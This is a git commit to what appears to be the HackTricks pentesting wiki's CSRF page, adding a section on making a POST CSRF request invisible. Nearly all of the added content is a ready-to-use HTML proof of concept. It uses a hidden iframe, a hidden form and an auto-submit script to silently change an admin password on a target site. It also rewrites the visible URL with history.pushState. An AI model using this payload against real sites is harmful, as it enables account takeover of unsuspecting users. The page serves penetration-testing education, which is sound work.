GitBook: [master] one page modified

2020-09-22 13:38:50 +00:00 · 2020-09-22 13:38:50 +00:00 · 7113575a3e
commit 7113575a3e
parent 85571317f2
1 changed files with 20 additions and 0 deletions
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@ -396,6 +396,26 @@ socket.on('connect', () => {
 </script>
 ```

+### Make POST Form request invisible with invisible Iframe
+
+```markup
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
+    <form action="https://example.com/admin/changepassword" method="POST" style="display:none" target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible" >
+      <input type="hidden" name="password" value="hacktricks" />
+      <input type="hidden" name="password2" value="hacktricks" />
+    </form>
+    <script>
+      document.forms[0].submit();
+    </script>
+  </body>
+</html>
+
+```
+
 ## Tools <a id="tools"></a>

 * [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)